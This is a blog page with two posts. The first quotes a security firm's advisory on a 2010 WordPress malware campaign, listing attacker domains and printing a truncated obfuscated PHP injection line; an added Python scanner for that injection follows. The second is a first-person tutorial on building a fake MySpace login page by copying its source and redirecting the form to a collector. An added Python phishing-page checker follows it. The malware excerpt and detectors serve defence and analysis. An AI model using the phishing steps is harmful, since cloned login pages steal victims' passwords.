Oct 31 2010

One of my blogs was hit today (Happy Halloween) by this new strain of WordPress Blog attacks. The Sucuri Team was able to tackle the infection without issue and has posted some good information on the latest version attacking (at this point) GoDaddy servers. Read more below:

“Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll. php?k=1

www3.hope-soft57. net
www3.new-protectionsoft23. in
www4.free-pc-protection9. in

http://insomniaboldinfocom.com/mm. php

http://insomniaboldinfonet.com/mm. php

www3.large-defense1. in

All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the eval(base64_decode encoded. What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline. com
meqashoppercom. com
insomniaboldinfocom. com

The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Click this link for more info on Sucuri’s Security Services!
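Detection logic for the injected line quoted above, added here as an example (it is not Sucuri's cleanup script and not code from the original post): it decodes string literals written entirely as \xNN escapes, flags source where they spell create_function or base64_decode, and decodes the neighbouring base64 payload for review. The function names, SAMPLE and its harmless payload are constructed for illustration.

```python
import base64
import re
from pathlib import Path

# Function names the injected line hides behind \xNN escapes (per the excerpt above).
HIDDEN_NAMES = ("create_function", "base64_decode")
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')  # literal made only of \xNN
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')    # long base64-looking literal

def decode_hex_literals(php_source):
    """Decode every double-quoted literal that consists only of \\xNN escapes."""
    return [
        bytes.fromhex(m.group(1).replace("\\x", "")).decode("latin-1")
        for m in HEX_LITERAL.finditer(php_source)
    ]

def scan_source(php_source):
    """Return (hidden function names found, decoded base64 payloads)."""
    decoded = decode_hex_literals(php_source)
    names = [n for n in HIDDEN_NAMES if n in decoded]
    payloads = []
    if names:  # only decode payloads that sit next to a hidden function name
        for m in B64_LITERAL.finditer(php_source):
            try:
                raw = base64.b64decode(m.group(1), validate=True)
                payloads.append(raw.decode("latin-1"))
            except ValueError:
                pass  # not valid base64, so not a payload
    return names, payloads

def scan_tree(root):
    """Map each .php file under root that hides a function name to its findings."""
    report = {}
    for path in Path(root).rglob("*.php"):
        names, payloads = scan_source(path.read_text(errors="replace"))
        if names:
            report[str(path)] = (names, payloads)
    return report

# Constructed sample: same shape as the injected line, with a harmless payload.
_payload = base64.b64encode(b"/* constructed placeholder payload */").decode()
SAMPLE = (
    '<?php $_a="' + "".join("\\x%02x" % b for b in b"create_function") + '";'
    '$_b="' + "".join("\\x%02x" % b for b in b"base64_decode") + '";'
    '$_c=$_a("",$_b("' + _payload + '")); ?>'
)
```

The excerpt in the post is truncated with "..", so run scan_tree over the actual files on disk rather than over text copied from the page.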

Posted by admin
Apr 09 2008

04.09.08 by justy

When you see the word “phishing”, many of you think, what the heck is phishing? Well, it obviously comes from the word “fishing”. It’s simply using a lure to reel victims into giving you their login & password info. It could be for your bank info, myspace or any email service that you use. A couple of years ago, I figured out how to phish myspace passwords. I only tested myself to see if I could actually do it & if it would work. Sure enough, it did. It’s simple really. After about 6 hours of poking around, googling & figuring out how to read the source code… voila. However, since myspace started with the captcha feature, it’s more difficult. But, I have found if you send the fake login link through an email to the victim & they click on it, myspace doesn’t warn them, because it’s not coming from their site. I’ll tell you a “few” ways about how I did it. I set up an account with a website that has an HTML editor, so I chose freewebs.com. They make you wait 7 days to validate your account, but it’s worth it. I tried geocities, but they weren’t as good. I went to the myspace home login page, & made sure it said “you must be logged in to do that”… it looks more believable, well, that’s what I think :) Then right click & hit view page source.

[Image: view source]

Select all & hit copy. I logged into my freewebs account, then go to build & edit, which is the site manager. Click on add a page -> then label the page name (I used loginmyspace, so that when people happen to look at the URL, it has some term related to myspace), then I made sure that on the right dropbox, it was marked html, not htm. At the bottom, it shows that the file was created.

[Image: filemanager]

Hit edit & a blank screen will come up. This is the HTML editor. Paste the copied source code from the myspace login page into the editor & hit save. There’s a whole bunch of coding, but the important part is to find the “form action post” where the login info is! Below is a screenshot where I highlighted that info. This is the only part of the code that needs to be changed:

[Image: form action post highlighted]

Then go to site add-ons & click webforms. This is the info you put into the form action post in the HTML editor. The blurred info below will not be blurry, once you open it with your account info.

[Image: webforms info]

The rest of the info, I can’t give. But if you poke around the site, you’ll figure it out. Please keep in mind, this is for educational purposes, it’s not meant to do or cause malicious deeds :) ~ & please do not email me for the rest of the instructions, bc I will not give them out. If you want to avoid phishers, make sure your URL (web address) says: http://www.myspace.com & make sure nothing is before or after it in the address bar. There is an addon that you can get that will alert you if your page is being phished. It also gives information on each site you visit, meaning if it’s malicious or not, they alert you. This is great if you log into your bank account daily. I use it!

Here’s the link to add it: netcraft anti-phishing bar
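The address-bar advice above, together with the post's observation that the form action is the only part of a copied login page that changes, can be checked mechanically. The following is an added example, not part of the original post: it compares the page's host with the expected one and reports any password form that submits somewhere else. The function names, URLs and HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class _FormCollector(HTMLParser):
    """Record each <form> action and whether the form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []  # list of [action, has_password_field]

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append([attrs.get("action") or "", False])
        elif tag == "input" and self.forms:
            if (attrs.get("type") or "").lower() == "password":
                self.forms[-1][1] = True

def audit_login_page(page_url, html, expected_host):
    """Return a list of findings; an empty list means both checks passed."""
    findings = []
    page_host = (urlsplit(page_url).hostname or "").lower()
    if page_host != expected_host:  # exact match: nothing before or after the host
        findings.append("page host is %s, not %s" % (page_host, expected_host))
    collector = _FormCollector()
    collector.feed(html)
    for action, has_password in collector.forms:
        # Relative actions resolve against the page URL, as a browser would do.
        target = (urlsplit(urljoin(page_url, action)).hostname or "").lower()
        if has_password and target != expected_host:
            findings.append("password form posts to %s" % target)
    return findings

# Constructed pages: the same login form, differing only in URL and form action.
FORM = ('<form action="%s" method="post"><input name="email">'
        '<input type="password" name="pw"></form>')
GENUINE = ("http://www.myspace.com/login", FORM % "/login")
COPY = ("http://hosting.example/loginmyspace.html",
        FORM % "http://hosting.example/webform")
```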

Posted by admin

© 2010-2017 She-Geeks.com All Rights Reserved